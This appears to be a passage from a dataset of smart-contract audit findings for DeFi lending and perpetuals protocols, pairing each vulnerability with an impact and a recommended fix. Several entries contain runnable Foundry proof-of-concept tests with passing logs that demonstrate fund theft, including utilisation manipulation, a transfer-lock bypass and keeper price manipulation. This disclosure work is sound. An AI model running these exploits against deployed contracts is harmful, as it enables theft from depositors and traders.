provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, \"initial pool balance. This is also the amount deposited into tranche\");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log(\"warp 2 minutes into future\");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log(\"mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, \"shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\");\\n\\n\\n }\\n```\\nчAdd a utilisation cap of 100%. Many other lending protocols implement this mitigation.чAn early depositor can steal funds from future depositors through utilisation/interest rate manipulation.ч```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n -`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access controlчmediumчWhen refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the `flashaction` should originate from there. This will cause the call to revert, making it impossible to refinance across `lendingPools`.ч`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditorчRefinancing is impossibleч```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n -Malicious keepers can manipulate the price when executing an orderчhighчMalicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. In addition, the contest page mentioned that \"an offchain price that is pulled by the keeper and pushed onchain at time of any order execution\".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n // Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}(\"\");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper is permissionless, thus anyone can be a keeper and execute order on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to a higher price of $1000. When the latest price of $950 gets updated, the longer position will immediately incur a loss of $50. Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses an up-to-date price stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.чEnsure that the keepers must update the Pyth price when executing an order. Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).чLoss of assets as shown in the scenario above.ч```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n -Losses of some long traders can eat into the margins of othersчmediumчThe losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1 Bob's Long Position 2 Charles (LP)\\nPosition Size = 6 ETH\\nMargin = 3 ETH\\nLast Price (entry price) = $1000 Position Size = 6 ETH\\nMargin = 5 ETH\\nLast Price (entry price) = $1000 Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero, and ignored in this report for simplicity's sake.\\nAt $T1$, the price of the ETH drops from $1000 to $600. At this point, the settle margin of both long positions will be as follows:\\nAlice's Long Position 1 Bob's Long Position 2\\npriceShift = Current Price - Last Price = $600 - $1000 = -$400\\nPnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $400 = -4 ETH\\nsettleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH PnL = -4 ETH (Same calculation)\\nsettleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set to as follows (ignoring the `_marginDelta` for simplicity's sake)\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH collateral is deducted from the long traders and transferred to LP. When `newMarginDepositedTotal` is zero, this means that the long trader no longer owns any collateral. This is incorrect, as Bob's position should still contribute 1 ETH remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nbeing File: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\nчThe following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice -1 ETH loss should be borne by the LP, not the long traders. The stable collateral total of LP should be deducted by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. Bob's margin should be isolated from Alice's loss.чLoss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.ч```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n -The transfer lock for leveraged position orders can be bypassedчhighчThe leveraged positions can be closed either through `DelayedOrder` or through the `LimitOrder`. Once the order is announced via `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function the LeverageModule's `lock` function is called to prevent given token to be transferred. This mechanism can be bypassed and it is possible to unlock the token transfer while having order announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position is getting unlocked while the leverage close announcement is active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral stealing the funds from the third party that the leveraged position was sold to.\\nFollowing proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(\"alice balance\", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after creating two orders\", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(\"new owner of position NFT\", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after transfering position NFT out e.g. selling\", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(\"alice after executing delayerd order and cashing out profit\", finalBalance);\\n console2.log(\"profit\", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nчIt is recommended to prevent announcing order either through `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.чThe attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.ч```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(\"alice balance\", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after creating two orders\", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(\"new owner of position NFT\", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after transfering position NFT out e.g. selling\", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(\"alice after executing delayerd order and cashing out profit\", finalBalance);\\n console2.log(\"profit\", finalBalance - balance);\\n}\\n```\\n -A malicious user can bypass limit order trading fees via cross-function re-entrancyчhighчA malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called, with the function `onERC721Received(address,address,uint256,bytes)`\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position. (stop loss, take profit levels)\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satify the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nrun `forge test --mt test_tradingFeeBypass -vv` in the terminal\\n\\n\\nчTo fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever there are still more state changes that would occur after the `_mint` function (potentially yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, \"Additional Size of a position cannot be zero\");\\n```\\nчA malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.ч```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n -Incorrect handling of PnL during liquidationчhighчThe incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that {`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final `newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral 